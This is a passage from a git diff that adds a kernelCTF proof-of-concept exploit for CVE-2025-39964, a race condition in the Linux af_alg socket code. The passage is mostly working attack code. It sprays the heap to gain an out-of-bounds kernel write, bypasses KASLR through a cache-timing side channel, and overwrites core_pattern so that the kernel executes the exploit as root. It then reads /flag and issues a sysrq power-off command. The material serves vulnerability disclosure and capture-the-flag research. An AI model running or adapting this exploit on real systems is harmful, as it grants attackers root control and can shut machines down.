(getenv("KTEXT")) + 
stext = strtoull(getenv("KTEXT"), 0, 16); + else + stext = bypass_kaslr(0); + /* core_pattern symbol is at a fixed offset from _stext */ + core_pattern = stext + CORE_PATTERN_COS_OFFSET; + printf("got stext 0x%zx 0x%zx\n", stext, core_pattern); + } + + struct rlimit rlim = {.rlim_cur = 0xf000, .rlim_max = 0xf000}; + setrlimit(RLIMIT_NOFILE, &rlim); + + if (argc > 1) { +#define SYS_pidfd_getfd 438 + int pid = strtoull(argv[1], 0, 10); + int pfd = syscall(SYS_pidfd_open, pid, 0); + int stdinfd = syscall(SYS_pidfd_getfd, pfd, 0, 0); + int stdoutfd = syscall(SYS_pidfd_getfd, pfd, 1, 0); + int stderrfd = syscall(SYS_pidfd_getfd, pfd, 2, 0); + dup2(stdinfd, 0); + dup2(stdoutfd, 1); + dup2(stderrfd, 2); + /* Run cat /flag multiple times to ensure output is flushed before reboot */ + for (int i = 0; i < 6; i++) + system("cat /flag"); + + system("cat /flag;echo o>/proc/sysrq-trigger"); + execlp("bash", "bash", NULL); + } + /* Step 7: fork a watcher that polls core_pattern and triggers crash once + * overwritten */ + if (fork() == 0) { + set_cpu(0); + setsid(); + crash(""); + } + /* Retry loop: trigger_exploit() may fail the race; restart on failure */ + while (1) { + if (fork() == 0) { + trigger_exploit(); + exit(0); + } + wait(NULL); + } +} + +int trigger_exploit() { + int tfmfd; + + set_cpu(1); + SYSCHK(socketpair(AF_UNIX, SOCK_STREAM, 0, cfd)); + + /* Step 1: spray heap with crafted msg_control buffers */ + spray_unix_sockets(); + + char *addr = SYSCHK(mmap(0, MMAP_REGION_LEN, PROT_READ | PROT_WRITE, + MAP_PRIVATE | MAP_ANON, -1, 0)); + struct iovec local = {.iov_base = addr, .iov_len = MMAP_REGION_LEN}; + struct iovec remote = {.iov_base = addr, .iov_len = MMAP_REGION_LEN}; + + struct sockaddr_alg sa = { + .salg_family = AF_ALG, + .salg_type = "skcipher", /* symmetric key cipher */ + .salg_name = "cbc(aes)", /* AES in CBC mode */ + }; + + /* Step 2: create and bind the AF_ALG transformation socket */ + tfmfd = socket(AF_ALG, SOCK_SEQPACKET, 0); + if (tfmfd == -1) { + 
perror("socket"); + return 1; + } + + if (bind(tfmfd, (struct sockaddr *)&sa, sizeof(sa)) != 0) { + perror("bind"); + close(tfmfd); + return 1; + } + + unsigned char key[32] = {0}; + if (setsockopt(tfmfd, SOL_ALG, ALG_SET_KEY, key, sizeof(key)) != 0) { + perror("setsockopt"); + close(tfmfd); + return 1; + } + + opfd = accept(tfmfd, NULL, 0); + if (opfd == -1) { + perror("accept"); + close(tfmfd); + return 1; + } + + int val = 0x1000; + + struct { + struct cmsghdr cmsg; + __u32 op; + __u32 ivlen; + unsigned char iv[16]; + } __attribute__((__packed__)) msg; + + memset(&msg, 0, sizeof(msg)); + msg.cmsg.cmsg_level = SOL_ALG; + msg.cmsg.cmsg_type = ALG_SET_OP; + msg.cmsg.cmsg_len = CMSG_LEN(sizeof(__u32) + sizeof(__u32) + 16); + + msg.op = ALG_OP_ENCRYPT; + msg.ivlen = 16; + memset(msg.iv, 0x01, 16); + + struct iovec iov = { + .iov_base = buf, + .iov_len = 0x1000, + }; + + struct msghdr msgh; + memset(&msgh, 0, sizeof(msgh)); + msgh.msg_iov = &iov; + msgh.msg_iovlen = 1; + msgh.msg_control = &msg; + msgh.msg_controllen = msg.cmsg.cmsg_len; + + /* Step 3: initial sendmsg to initialise the tsgl; advances sgl->cur to 1 */ + ssize_t n = sendmsg(opfd, &msgh, MSG_MORE); + printf("init %ld\n", n); + + /* + * Step 3 (cont): advance sgl->cur from 1 to 124 (MAX_SGL_ENTS - 2) using + * SGL_MERGE_ITERATIONS = 0x7b send+recv pairs. Each send allocates one sg + * entry (cur++); each recv drains the processed entry so the socket stays + * writable. The loop comment in the original PR is: + * "the loop with 0x7b + the sendmsg and send calls executes 125 times, + * matching MAX_SGL_ENTS - 1 = 126 - 1 = 125." 
+ */ + for (int i = 0; i < SGL_MERGE_ITERATIONS; i++) { + SYSCHK(send(opfd, buf, 0x1000, MSG_MORE)); + n = recv(opfd, buf, 0x1000, 0); + } + + /* Advance sgl->cur to 125 = MAX_SGL_ENTS - 1 (one slot before the list is + * full) */ + send(opfd, buf, 0x1000, MSG_MORE); + SYSCHK(setsockopt(opfd, SOL_SOCKET, SO_SNDBUF, &val, sizeof(val))); + printf("setsockopt done\n"); + + /* + * Step 3 (race): fork two children that race each other: + * + * Child A (send invalid addr): passes INVALID_USER_ADDR, which causes + * af_alg_alloc_tsgl() to allocate a new tsgl (sgl->cur → 0) then fail + * in memcpy_from_msg() — leaving ctx->merge = 1 and sgl->cur = 0. + * + * Child B (send 0x200 bytes): sends a sub-page-size buffer so that + * ctx->merge is set to 1 and sgl->cur advances to MAX_SGL_ENTS = 126. + * + * Desired outcome: both children finish such that ctx->merge == 1 AND the + * last tsgl has sgl->cur == 0. The next send() will then use sg[-1]. + */ + if (fork() == 0) { + /* Child A: trigger new-tsgl allocation then fail — sets sgl->cur = 0 */ + int x = send(opfd, INVALID_USER_ADDR, 0x400, MSG_MORE); + printf("send3 %d\n", x); + exit(0); + } + + if (fork() == 0) { + /* Child B: sub-page send sets ctx->merge = 1 and fills sgl->cur to + * MAX_SGL_ENTS */ + int x = send(opfd, buf, 0x200, MSG_MORE); + printf("send2 %d\n", x); + exit(0); + } + + /* + * @sleep(desc="wait for both fork children to reach their send() calls and + * set ctx->merge=1 with sgl->cur=0 before we recv()") + */ + sleep(1); + n = recv(opfd, buf, 0x1000, 0); + printf("recv2 %ld\n", n); + wait(NULL); + + /* Step 4: release spray threads so they re-send their crafted payloads */ + for (int i = 0; i < THREAD_NUM; i++) { + write(cfd[1], buf, 1); + } + + n = recv(opfd, buf, 0x1000, 0); + printf("recv2 %ld\n", n); + + memset(buf, 'z', 0x1000); + wait(NULL); + + /* Step 5: map userspace oracle region for the binary search */ + allocate_map(); + + /* Step 5 (OOB trigger): with ctx->merge=1 and sgl->cur=0 this send uses 
+ * sg[-1].page_link from our sprayed payload — triggering the OOB write. + * The check below treats a return of 1 as a lost race ("Race fail") and exits; + * any other return value lets the search continue. + */ + int x = send(opfd, buf, 1, MSG_MORE); + + if (x == 1) { + puts("Race fail"); + exit(0); + } + + /* + * Step 5 (binary search oracle): + * + * Background: + * sg[-1].page_link is effectively a pointer to a struct page in vmemmap. + * The kernel computes the write destination as: + * dest = page_address(sg_page(sg)) + sg->offset + sg->length + * = page_offset_base + (page_link - vmemmap_base) / 64 * PAGE_SIZE + * + offset + length + * With page_link ≈ 0, the pfn arithmetic wraps to a very large value, and + * (page_offset_base + pfn * PAGE_SIZE) wraps further to land within our + * userspace oracle region [SCAN_START_ADDR, SCAN_END_ADDR). + * + * Oracle: + * send() returns 1 → the write destination is in a mapped page (success). + * send() returns -1 → the destination is unmapped (copy_from_user failed). + * By progressively munmap-ing halves of the oracle region we can determine + * which physical page corresponds to the OOB write target. + * + * Binary search (8 iterations → narrows range from SCAN_END_ADDR to + * SCAN_END_ADDR >> 8, i.e. ~320 GiB): + * Each iteration j tests: "if I decrease page_link by half_range/64, does + * the write still succeed?" + * - Decreasing page_link by Δ shifts dest by Δ*64 bytes (since each + * struct-page unit = 64 bytes = one PAGE_SIZE/64 step in physmap). + * - The test delta (SCAN_END_ADDR >> (7+j)) in page_link units equals + * half_range = (SCAN_END_ADDR >> (1+j)) in dest-address units. + * If the shifted oracle still succeeds → dest is in the *upper* half → + * unmap the lower half and advance start. + * Otherwise → dest is in the *lower* half → unmap the upper half.
+ */ + size_t oracle; + size_t leak_offset = 0; + int xcnt = 0; + for (int k = 0; k < MAX_SCAN_ITERATIONS; k++) { + for (int i = 0; i < THREAD_NUM; i++) { + read(sfd[i][0], buf, 0x1000); + read(cfd[1], buf, 1); + } + *(size_t *)&payload[PAYLOAD_OFFS_TARGET] -= (SCAN_END_ADDR >> 6); + write(cfd[1], buf, 0x100); + buf[0] = 'a'; + x = send(opfd, buf, 1, MSG_MORE); + if (x == 1) { + puts(""); + xcnt++; + oracle = *(size_t *)&payload[PAYLOAD_OFFS_TARGET]; + char *start = (void *)(0ULL); + for (int j = 0; j < 8; j++) { + printf("loop j: %d\n", j); + x = guess_addr(oracle - (SCAN_END_ADDR >> (7 + j))); + if (x == 1) { + xcnt++; + start += (SCAN_END_ADDR >> (1 + j)); /* upper half */ + munmap(start - (SCAN_END_ADDR >> (1 + j)), + (SCAN_END_ADDR >> (1 + j))); + } else { + munmap(start + (SCAN_END_ADDR >> (1 + j)), + (SCAN_END_ADDR >> (1 + j))); + } + } + *(size_t *)&payload[PAYLOAD_OFFS_TARGET] = oracle; + /* search_offset returns the exact userspace VA of the OOB-written page */ + leak_offset = search_offset(start) + xcnt; + printf("leak_offset %zx\n", leak_offset); + printf("%zx\n", *(size_t *)&payload[PAYLOAD_OFFS_TARGET]); + + break; + } + } + + if (leak_offset == 0) + exit(0); + + for (int i = 0; i < THREAD_NUM; i++) { + read(sfd[i][0], buf, 0x1000); + read(cfd[1], buf, 1); + } + *(size_t *)&payload[PAYLOAD_OFFS_TARGET] = oracle; + write(cfd[1], buf, 0x100); + + /* + * Step 6: redirect the OOB write to core_pattern. + * + * leak_offset is the VA of the currently-targeted physical page. + * core_pattern is the KASLR-adjusted kernel VA of core_pattern[]. + * + * First, align within-page: send adjust_offset bytes so that after the + * advance the write starts at the same within-page offset as core_pattern. 
+ */ + size_t adjust_offset = + PAGE_SIZE + (core_pattern & PAGE_MASK) - (leak_offset & PAGE_MASK); + leak_offset += adjust_offset; + + memset(buf, 'z', 0x1000); + SYSCHK(send(opfd, buf, adjust_offset - 1, MSG_MORE)); + SYSCHK(send(opfd, buf, 1, MSG_MORE)); + + printf("sg->len overflow check %x\n", *(char *)(leak_offset - 1)); + if (*(char *)(leak_offset - 1) != 'z') + leak_offset -= 0x100000000ULL; + + for (int i = 0; i < THREAD_NUM; i++) { + read(sfd[i][0], buf, 0x1000); + read(cfd[1], buf, 1); + } + + /* + * Now adjust payload[PAYLOAD_OFFS_TARGET] (= sg[-1].page_link) so that + * page_address(sg_page(sg)) points to the physical page holding core_pattern. + * The >> 6 (or / 64) is actually a simplification of the formula + * (addr / 0x1000) * 64. We divide the address by 0x1000 to find the page + * index, and then multiply by 64 because each memory page has a page_struct + * that is exactly 64 bytes long. + * payload[PAYLOAD_OFFS_TARGET] is sg[-1].page_link, which controls dest via + * the formula described in the binary search comment above. 
+ */ + *(size_t *)&payload[PAYLOAD_OFFS_TARGET] += + (((core_pattern & ~PAGE_MASK) - (leak_offset & ~PAGE_MASK)) >> 6); + printf("%zx\n", *(size_t *)&payload[PAYLOAD_OFFS_TARGET]); + write(cfd[1], buf, 0x100); + /* Step 6 (write): send the core_pattern string; kernel copies it to + * core_pattern[] */ + char mcore[64] = "|/proc/%P/fd/666 %P"; + SYSCHK(send(opfd, mcore, 64, MSG_MORE)); + PAUSE; + + return 0; +} + +inline __attribute__((always_inline)) uint64_t rdtsc_begin() { + uint64_t a, d; + asm volatile("mfence\n\t" + "RDTSCP\n\t" + "mov %%rdx, %0\n\t" + "mov %%rax, %1\n\t" + "xor %%rax, %%rax\n\t" + "lfence\n\t" + : "=r"(d), "=r"(a) + : + : "%rax", "%rbx", "%rcx", "%rdx"); + a = (d << 32) | a; + return a; +} + +inline __attribute__((always_inline)) uint64_t rdtsc_end() { + uint64_t a, d; + asm volatile("xor %%rax, %%rax\n\t" + "lfence\n\t" + "RDTSCP\n\t" + "mov %%rdx, %0\n\t" + "mov %%rax, %1\n\t" + "mfence\n\t" + : "=r"(d), "=r"(a) + : + : "%rax", "%rbx", "%rcx", "%rdx"); + a = (d << 32) | a; + return a; +} + +void prefetch(void *p) { + asm volatile("prefetchnta (%0)\n" + "prefetcht2 (%0)\n" + : + : "r"(p)); +} + +size_t flushandreload(void *addr) /* row miss */ +{ + size_t time = rdtsc_begin(); + prefetch(addr); + size_t delta = rdtsc_end() - time; + return delta; +} + +/* + * KASLR bypass via Flush+Reload side channel. + * + * Uncomment KASLR_BYPASS_INTEL for Intel CPUs (kernelCTF remote instances). + * Keep commented for GitHub CI (AMD/other) to use the sliding-window variant. + * Alternatively pass -DKASLR_BYPASS_INTEL to the compiler without touching + * source. 
+ */ +// #define KASLR_BYPASS_INTEL +size_t bypass_kaslr(u64 base) { + if (!base) { +#ifdef KASLR_BYPASS_INTEL +#define OFFSET 0 +#define START (0xffffffff81000000ull + OFFSET) +#define END (0xffffffffD0000000ull + OFFSET) +#define STEP 0x0000000001000000ull + while (1) { + u64 bases[7] = {0}; + for (int vote = 0; vote < ARRAY_LEN(bases); vote++) { + size_t times[(END - START) / STEP] = {}; + uint64_t addrs[(END - START) / STEP]; + + for (int ti = 0; ti < ARRAY_LEN(times); ti++) { + times[ti] = ~0; + addrs[ti] = START + STEP * (u64)ti; + } + + for (int i = 0; i < 16; i++) { + for (int ti = 0; ti < ARRAY_LEN(times); ti++) { + u64 addr = addrs[ti]; + size_t t = flushandreload((void *)addr); + if (t < times[ti]) { + times[ti] = t; + } + } + } + + size_t minv = ~0; + size_t mini = -1; + for (int ti = 0; ti < ARRAY_LEN(times) - 1; ti++) { + if (times[ti] < minv) { + mini = ti; + minv = times[ti]; + } + } + + if (mini < 0) { + return -1; + } + + bases[vote] = addrs[mini]; + } + + int c = 0; + for (int i = 0; i < ARRAY_LEN(bases); i++) { + if (c == 0) { + base = bases[i]; + } else if (base == bases[i]) { + c++; + } else { + c--; + } + } + + c = 0; + for (int i = 0; i < ARRAY_LEN(bases); i++) { + if (base == bases[i]) { + c++; + } + } + if (c > ARRAY_LEN(bases) / 2) { + base -= OFFSET; + goto got_base; + } + + printf("majority vote failed:\n"); + printf("base = %llx with %d votes\n", base, c); + } +#else +#define START (0xffffffff81000000ull) +#define END (0xffffffffc0000000ull) +#define STEP 0x0000000000200000ull +#define NUM_TRIALS 9 +/* largest contiguous mapped area at the beginning of _stext */ +#define WINDOW_SIZE 11 + + while (1) { + u64 bases[NUM_TRIALS] = {0}; + + for (int vote = 0; vote < ARRAY_LEN(bases); vote++) { + size_t times[(END - START) / STEP] = {}; + uint64_t addrs[(END - START) / STEP]; + + for (int ti = 0; ti < ARRAY_LEN(times); ti++) { + times[ti] = ~0; + addrs[ti] = START + STEP * (u64)ti; + } + + for (int i = 0; i < 16; i++) { + for (int ti = 0; ti 
< ARRAY_LEN(times); ti++) { + u64 addr = addrs[ti]; + size_t t = flushandreload((void *)addr); + if (t < times[ti]) { + times[ti] = t; + } + } + } + + uint64_t max = 0; + int max_i = 0; + for (int ti = 0; ti < ARRAY_LEN(times) - WINDOW_SIZE; ti++) { + uint64_t sum = 0; + for (int i = 0; i < WINDOW_SIZE; i++) { + sum += times[ti + i]; + } + if (sum > max) { + max = sum; + max_i = ti; + } + } + + bases[vote] = addrs[max_i]; + } + + int c = 0; + for (int i = 0; i < ARRAY_LEN(bases); i++) { + if (c == 0) { + base = bases[i]; + } else if (base == bases[i]) { + c++; + } else { + c--; + } + } + + c = 0; + for (int i = 0; i < ARRAY_LEN(bases); i++) { + if (base == bases[i]) { + c++; + } + } + if (c > ARRAY_LEN(bases) / 2) { + goto got_base; + } + + printf("majority vote failed:\n"); + printf("base = %llx with %d votes\n", base, c); + } +#endif + } + +got_base: + + printf("using kernel base %llx\n", base); + + return base; +} diff --git a/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/exploit/lts-6.12.44/Makefile b/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/exploit/lts-6.12.44/Makefile new file mode 100644 index 000000000..3eabaca61 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/exploit/lts-6.12.44/Makefile @@ -0,0 +1,5 @@ +all: exploit + +exploit: exploit.c + gcc -static-pie -o exploit exploit.c + diff --git a/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/exploit/lts-6.12.44/exploit b/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/exploit/lts-6.12.44/exploit new file mode 100755 index 000000000..16c519ca2 Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/exploit/lts-6.12.44/exploit differ diff --git a/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/exploit/lts-6.12.44/exploit.c b/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/exploit/lts-6.12.44/exploit.c new file mode 100644 index 000000000..837b3b79a --- /dev/null +++ 
b/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/exploit/lts-6.12.44/exploit.c @@ -0,0 +1,899 @@ +/* + * Exploit for CVE-2025-39964 — Linux af_alg out-of-bounds write (LTS 6.12.44) + * + * Vulnerability: af_alg_sendmsg() has a race condition allowing two concurrent + * sendmsg calls to produce ctx->merge=1 with sgl->cur=0 simultaneously. + * In this state the merge branch computes sg = sgl->sg + sgl->cur - 1 = sg[-1], + * which is an out-of-bounds read into the previous heap chunk. The + * sg[-1].page_link value from the previous chunk controls the destination of + * memcpy_from_msg(), giving an arbitrary kernel write primitive. + * + * Exploit chain (LTS 6.12.44): + * 1. Spray 0x100 AF_UNIX socket pairs; each thread sends a crafted msghdr + * whose msg_control (payload[]) lands in the heap slot just before an + * af_alg_tsgl. payload[PAYLOAD_OFFS_TARGET] controls sg[-1].page_link = write + * destination. + * 2. Set up an AF_ALG socket (AES-CBC); advance sgl->cur to MAX_SGL_ENTS-1 = + * 125 using 1 sendmsg + SGL_MERGE_ITERATIONS send/recv pairs + 1 more send. + * 3. Fork two children that race: one sets ctx->merge=1 + * (sgl->cur→MAX_SGL_ENTS), the other allocates a new sgl (sgl->cur→0) via an + * invalid userspace pointer. + * 4. With ctx->merge=1 and sgl->cur=0, the next sendmsg triggers the OOB write + * to the address derived from payload[PAYLOAD_OFFS_TARGET]. + * 5. Map [SCAN_START_ADDR, SCAN_END_ADDR) in MAP_CHUNK_SIZE (2 GB) chunks so + * the OOB write destination (which wraps into userspace due to page_link + * arithmetic) falls in a mapped region. An 8-step binary search (oracle = + * send() return value) narrows the target to a ~340 MB window; mincore then + * locates the exact page. + * 6. Adjust the write destination via page_link arithmetic to point to the + * core_pattern kernel symbol, then write "|/proc/%P/fd/666 %P". + * 7. 
A forked child watches for core_pattern to change, then faults (NULL + * deref), causing the kernel to execute our binary as root via core_pattern. + * 8. Re-exec reads /flag via pidfd_getfd() on the parent's stdio descriptors. + */ + +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#ifndef SYS_pidfd_getfd +#define SYS_pidfd_getfd 438 +#endif + +#ifndef SYS_pidfd_open +#define SYS_pidfd_open 434 +#endif + +size_t vmemmap_base = 0xffffea0000000000ULL; +size_t page_offset_base = 0xffff888000000000ULL; +size_t core_pattern = 0xffffffff8420d520ULL; + +/* Socket options */ +#define ALG_SET_KEY 1 +#define ALG_SET_IV 2 +#define ALG_SET_OP 3 +#define ALG_SET_AEAD_ASSOCLEN 4 +#define ALG_SET_AEAD_AUTHSIZE 5 +#define ALG_SET_DRBG_ENTROPY 6 +#define ALG_SET_KEY_BY_KEY_SERIAL 7 + +/* Operations */ +#define ALG_OP_DECRYPT 0 +#define ALG_OP_ENCRYPT 1 + +typedef unsigned char u8; +typedef unsigned short u16; +typedef unsigned int u32; +typedef unsigned long long u64; +typedef char i8; +typedef short i16; +typedef int i32; +typedef long long i64; +#define ARRAY_LEN(x) (sizeof(x) / sizeof(x[0])) + +#define __u32 uint32_t +#define __u16 uint16_t +#define __u8 uint8_t +#define PAUSE \ + { \ + int x; \ + printf(":"); \ + read(0, &x, 1); \ + } + +#define SYSCHK(x) \ + ({ \ + typeof(x) __res = (x); \ + if (__res == (typeof(x))-1) \ + err(1, "SYSCHK(" #x ")"); \ + __res; \ + }) + +#ifndef SYS_process_vm_readv +#define SYS_process_vm_readv 310 +#endif + +/* Number of AF_UNIX pairs to spray; one pair per exploit thread */ +#define THREAD_NUM 0x100 + +/* + * Size of each private anonymous mapping used as the OOB write oracle region: + * 512 PTEs per page * PAGE_SIZE = 2 MB physical coverage per mmap entry. + */ +#define MMAP_REGION_LEN (0x1000 / 8 * 0x1000) + +/* + * Start of the contiguous userspace region we map for the binary-search oracle. 
+ * We start just above the 4 GB boundary to avoid the low userspace region. + */ +#define SCAN_START_ADDR 0x100000000ULL + +/* Maximum number of mincore windows tried during the page-address scan */ +#define MAX_SCAN_ITERATIONS 0x50 + +/* + * Address passed as a deliberately bad user pointer to trigger the race + * condition. 0xfff000 lies one page below the 16 MB mark; the exploit relies + * on nothing being mapped there, so the kernel's copy from it fails. + */ +#define INVALID_USER_ADDR ((void *)0xfff000) + +/* + * Byte offset of sg[-1].page_link inside the sprayed msg_control payload: + * af_alg_tsgl is allocated in a 4096-byte slab object. + * sgl->sg[0] starts at byte 24 (sizeof(af_alg_tsgl)). + * sg[-1] = sgl->sg[-1] lies 32 bytes (sizeof(scatterlist)) before sg[0], + * i.e. at byte 24 - 32 = -8 relative to the tsgl object start. + * In the *previous* 4096-byte heap object that is offset 4096 - 8 = 0xff8. + * scatterlist.page_link is the first field (offset 0), so payload[0xff8] + * directly controls the page_link that the OOB write uses as its destination. + */ +#define PAYLOAD_OFFS_TARGET 0xff8 + +/* + * Number of send/recv iterations to advance sgl->cur from 1 to 124 + * (MAX_SGL_ENTS-2). MAX_SGL_ENTS = (4096 - sizeof(af_alg_tsgl)) / + * sizeof(scatterlist) - 1 = (4096 - 24) / 32 - 1 = 126. One initial sendmsg + * sets cur=1; SGL_MERGE_ITERATIONS send+recv pairs bring it to 1 + 0x7b = 124; + * one more send brings it to 125 = MAX_SGL_ENTS - 1. + */ +#define SGL_MERGE_ITERATIONS 0x7b + +/* Compile-time unslid base of kernel text (_stext); used when computing symbol + * offsets */ +#define KERNEL_TEXT_BASE 0xffffffff81000000UL + +/* + * KASLR-invariant offset of core_pattern from _stext in LTS 6.12.44. + * core_pattern is at 0xffffffff8420e260; _stext is at KERNEL_TEXT_BASE.
+ */ +#define CORE_PATTERN_LTS_OFFSET (0xffffffff8420e260UL - KERNEL_TEXT_BASE) + +/* Upper bound of the userspace oracle scan region [SCAN_START_ADDR, + * SCAN_END_ADDR) */ +#define SCAN_END_ADDR 0x500000000000ULL + +/* Size of each anonymous 2 GB mmap chunk used to cover the oracle region */ +#define MAP_CHUNK_SIZE 0x80000000ULL + +#ifndef PAGE_SIZE +#define PAGE_SIZE 0x1000 +#endif +/* Page offset mask for within-page alignment (PAGE_SIZE - 1) */ +#define PAGE_MASK (PAGE_SIZE - 1) + +pthread_t tid[THREAD_NUM]; + +/* Shared scratch buffer used by spray threads and the main exploit loop */ +char buf[0x10000]; +char vec[0x100000]; + +int cfd[2]; +int sfd[THREAD_NUM][2]; +char payload[0x1000]; +int opfd; + +struct sockaddr_alg { + __u16 salg_family; + __u8 salg_type[14]; + __u32 salg_feat; + __u32 salg_mask; + __u8 salg_name[64]; +}; + +void set_cpu(int i) { + cpu_set_t mask; + CPU_ZERO(&mask); + CPU_SET(i, &mask); + sched_setaffinity(0, sizeof(mask), &mask); +} + +void *spray_send_thread(void *x) { + size_t idx = (size_t)x; + write(cfd[0], buf, 1); + read(cfd[0], buf, 1); + struct iovec iov = {buf, 0x1000}; + struct msghdr mhdr = {.msg_iov = &iov, + .msg_iovlen = 1, + .msg_control = payload, + .msg_controllen = 0x1000}; + while (1) { + sendmsg(sfd[idx][1], &mhdr, 0); + write(cfd[0], buf, 1); + read(cfd[0], buf, 1); + } +} + +/* + * Step 1: Spray THREAD_NUM AF_UNIX socket pairs, each sending a crafted msghdr + * whose msg_control buffer (payload[]) will occupy the heap slot immediately + * preceding an af_alg_tsgl allocation. payload[PAYLOAD_OFFS_TARGET] then + * aliases sg[-1].page_link and controls the OOB write destination. 
+ */ +void spray_unix_sockets() { + memset(payload, 'a', 0x1000); + struct cmsghdr *first; + first = (struct cmsghdr *)payload; + first->cmsg_len = 0x1000; + first->cmsg_level = + 0; /* must differ from SOL_SOCKET=1 to skip cmsg processing */ + first->cmsg_type = 0x41414141; /* dummy filler value */ + /* Initially zero; the binary search will update this to guide the OOB write + */ + *(size_t *)&payload[PAYLOAD_OFFS_TARGET] = 0; + + for (int i = 0; i < THREAD_NUM; i++) { + SYSCHK(socketpair(AF_UNIX, SOCK_DGRAM, 0, sfd[i])); + int n = 0x800; + setsockopt(sfd[i][1], SOL_SOCKET, SO_SNDBUF, (char *)&n, sizeof(n)); + setsockopt(sfd[i][0], SOL_SOCKET, SO_RCVBUF, (char *)&n, sizeof(n)); + write(sfd[i][1], buf, 0x1000); + } + + for (int i = 0; i < THREAD_NUM; i++) + pthread_create(&tid[i], 0, spray_send_thread, (void *)(size_t)i); + + for (int i = 0; i < THREAD_NUM; i++) + read(cfd[1], buf, 1); +} + +/* + * Step 5a: Map the full userspace range [SCAN_START_ADDR, SCAN_END_ADDR) with + * physical pages in MAP_CHUNK_SIZE (2 GB) chunks. When sg[-1].page_link is + * crafted with a value near 0, the kernel's page_address() computation wraps + * around and the OOB write destination lands somewhere within this region. + * Mapping real pages here means the write silently succeeds (our oracle), + * letting us binary-search for the exact physical page by progressively + * munmap-ing halves of this range. + */ +void allocate_map() { + char *start = (void *)SCAN_START_ADDR; + while (1) { + start = SYSCHK(mmap(start, MAP_CHUNK_SIZE, PROT_READ | PROT_WRITE, + MAP_SHARED | MAP_ANON | MAP_FIXED, -1, 0)); + start += MAP_CHUNK_SIZE; + if ((size_t)start >= SCAN_END_ADDR) + break; + } +} + +/* + * Step 5b: Use mincore to find the exact virtual address in [start, start+4GB) + * that corresponds to the physical page the OOB write targets. 
A page marked + * resident (mincore bit = 1) that also contains our spray marker ('a') is the + * hit: it is the page that the kernel's arbitrary-write wrote into. + */ +size_t search_offset(char *start) { + char *pvec = NULL; + for (int i = 0; i < MAX_SCAN_ITERATIONS; i++) { + mincore((void *)start, 0x100000000ULL, vec); + pvec = memchr(vec, 1, 0x100000); + if (pvec) { + char *leak_offset = start + (pvec - vec) * 0x1000; + pvec = memchr((void *)leak_offset, 'a', 0x1000); + if (pvec) + break; + } + start += 0x100000000ULL; + } + if (pvec == NULL) + exit(0); + printf("\npvec %p %x\n", pvec, pvec[0]); + return (size_t)pvec; +} + +int check_core() { + /* Check if /proc/sys/kernel/core_pattern has been overwritten */ + char core_pattern_buf[0x100] = {}; + int core = open("/proc/sys/kernel/core_pattern", O_RDONLY); + read(core, core_pattern_buf, sizeof(core_pattern_buf)); + close(core); + return strncmp(core_pattern_buf, "|/proc/%P/fd/666", 0x10) == 0; +} + +void crash(char *cmd) { + int memfd = memfd_create("", 0); + /* send our binary to memfd for core_pattern payload */ + SYSCHK(sendfile(memfd, open("/proc/self/exe", 0), 0, 0xffffffff)); + /* our binary now at file descriptor 666 */ + dup2(memfd, 666); + close(memfd); + while (check_core() == 0) + sleep(1); + puts("Root shell !!"); + /* Trigger program crash and cause kernel to execute program from core_pattern + * which is our "root" binary */ + *(size_t *)0 = 0; +} + +size_t bypass_kaslr(u64 base); + +int guess_addr(size_t guesss) { + for (int i = 0; i < THREAD_NUM; i++) { + read(sfd[i][0], buf, 0x1000); + read(cfd[1], buf, 1); + } + *(size_t *)&payload[PAYLOAD_OFFS_TARGET] = guesss; + write(cfd[1], buf, 0x100); + buf[0] = 'b'; + int x = send(opfd, buf, 1, MSG_MORE); + printf("x: %d\n", x); + return x == 1; +} + +int trigger_exploit(); +int main(int argc, char **argv) { + + setvbuf(stdin, 0, 2, 0); + setvbuf(stdout, 0, 2, 0); + puts("Exploit start"); + if (argc == 1) { + size_t stext = 0; + if (getenv("KTEXT")) + 
stext = strtoull(getenv("KTEXT"), 0, 16); + else + stext = bypass_kaslr(0); + /* core_pattern symbol is at a fixed offset from _stext; set MIT=1 for + * mitigation target */ + core_pattern = stext + CORE_PATTERN_LTS_OFFSET; + printf("got stext 0x%zx 0x%zx\n", stext, core_pattern); + } + + struct rlimit rlim = {.rlim_cur = 0xf000, .rlim_max = 0xf000}; + setrlimit(RLIMIT_NOFILE, &rlim); + + if (argc > 1) { +#define SYS_pidfd_getfd 438 + int pid = strtoull(argv[1], 0, 10); + int pfd = syscall(SYS_pidfd_open, pid, 0); + int stdinfd = syscall(SYS_pidfd_getfd, pfd, 0, 0); + int stdoutfd = syscall(SYS_pidfd_getfd, pfd, 1, 0); + int stderrfd = syscall(SYS_pidfd_getfd, pfd, 2, 0); + dup2(stdinfd, 0); + dup2(stdoutfd, 1); + dup2(stderrfd, 2); + /* Run cat /flag multiple times to ensure output is flushed before reboot */ + for (int i = 0; i < 6; i++) + system("cat /flag"); + + system("cat /flag;echo o>/proc/sysrq-trigger"); + execlp("bash", "bash", NULL); + } + /* Step 7: fork a watcher that polls core_pattern and triggers crash once + * overwritten */ + if (fork() == 0) { + set_cpu(0); + setsid(); + crash(""); + } + /* Retry loop: trigger_exploit() may fail the race; restart on failure */ + while (1) { + if (fork() == 0) { + trigger_exploit(); + exit(0); + } + wait(NULL); + } +} + +int trigger_exploit() { + int tfmfd; + + set_cpu(1); + SYSCHK(socketpair(AF_UNIX, SOCK_STREAM, 0, cfd)); + + /* Step 1: spray heap with crafted msg_control buffers */ + spray_unix_sockets(); + + char *addr = SYSCHK(mmap(0, MMAP_REGION_LEN, PROT_READ | PROT_WRITE, + MAP_PRIVATE | MAP_ANON, -1, 0)); + struct iovec local = {.iov_base = addr, .iov_len = MMAP_REGION_LEN}; + struct iovec remote = {.iov_base = addr, .iov_len = MMAP_REGION_LEN}; + + struct sockaddr_alg sa = { + .salg_family = AF_ALG, + .salg_type = "skcipher", /* symmetric key cipher */ + .salg_name = "cbc(aes)", 